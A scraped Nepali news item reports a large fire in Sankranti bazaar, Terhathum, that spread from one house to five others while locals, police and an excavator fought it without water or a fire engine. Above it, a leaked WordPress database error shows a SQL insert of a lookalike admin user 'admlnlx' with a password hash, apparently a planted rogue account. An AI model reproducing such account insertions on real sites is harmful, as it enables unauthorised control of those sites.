WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B14IB5QF7GHywgnkerrrirR/qanmbj.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-18 01:48:14', '', 'admlnlx', 'admlnlx')
ताप्लेजुङ,पुस १-
तेह्रथुमको संक्रान्ति बजारमा अहिले भिषण आगलागी भइरहेको छ । अग्नि सेंढाईको घरबाट सुरु भएको आगोले अन्य पाँच वटा घर समेत जलेर नष्ट भएको स्थानिय जीबन उप्रेतीले बताए ।
आगो नियन्त्रणका लागि अहिले स्थानिय, प्रहरी र एउटा स्काभेटर प्रयोग गरिएको भए पनि आगो नियन्त्रणमा आउन सकेको छैन । आगो नियन्त्रणमा लिन स्काभेटरले अन्य घरहरु भत्काइरहेको उप्रेतीले बताए ।
सो क्षेत्रमा दमकल र पानीको स्रोत नभएकाले आगो नियन्त्रणमा लिन समस्या भएको प्रहरीले बताएको छ । आज सो स्थानमा हाट बजार लागेकाले बजार आएकाहरु पनि आगो नियन्त्रणमा जुटेका छन् ।
संक्रान्ति बजारमा करीब एक सय ५० घर रहेका छन् ।